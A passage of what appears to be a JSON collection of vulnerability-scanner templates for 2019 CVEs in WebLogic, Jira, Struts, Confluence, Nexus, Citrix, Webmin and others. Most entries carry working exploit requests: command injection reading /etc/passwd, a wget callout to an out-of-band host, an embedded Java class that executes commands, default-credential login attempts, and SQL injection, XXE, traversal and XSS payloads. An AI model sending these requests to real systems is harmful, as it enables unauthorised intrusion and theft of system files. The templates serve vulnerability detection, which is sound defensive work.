7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File 